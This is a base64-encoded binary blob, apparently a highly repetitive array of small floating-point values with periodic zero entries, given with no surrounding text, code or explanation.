iU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fi